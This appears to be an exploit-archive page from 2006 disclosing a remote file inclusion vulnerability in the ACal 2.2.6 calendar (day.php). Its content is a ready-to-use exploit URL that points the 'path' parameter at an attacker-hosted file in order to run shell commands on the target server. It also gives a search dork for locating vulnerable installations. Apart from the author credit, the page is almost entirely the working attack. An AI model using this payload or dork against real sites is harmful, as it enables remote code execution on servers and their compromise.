[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : ACal <= 2.2.6 (day.php) Remote File Inclusion Vulnerability
# Published : 2006-05-07
# Author : PiNGuX
# Previous Title : Jetbox CMS <= 2.1 (relative_script_path) Remote File Inclusion Exploit
# Next Title : AWStats <= 6.5 (migrate) Remote Shell Command Injection Exploit


$*******************************************$
$ Title: ACal 2.2.6 = Remote File Inclusion $
$*******************************************$
$ URL: http://acalproj.sourceforge.net/ $
$***************************************$
$ Dork: intitle:"Login to Calendar" $
$***********************************$
$ Credits: PiNGuX $
$*****************$
$ Greetz : [0o] $
$***************$

Exploit:
http://[url]/[calendar_path]/embed/day.php?path=http://yourhost/cmd.gif?cmd=ls

# www.Syue.com [2006-05-07]